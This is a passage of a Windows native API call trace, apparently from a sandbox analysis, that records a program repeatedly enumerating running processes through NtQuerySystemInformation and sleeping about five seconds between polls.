[0126.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.864] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.880] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.911] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.927] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.942] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.957] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.972] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.989] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.003] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.020] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.035] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.051] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.067] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.083] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.098] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.128] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.155] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.159] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.178] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.192] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.206] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.222] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 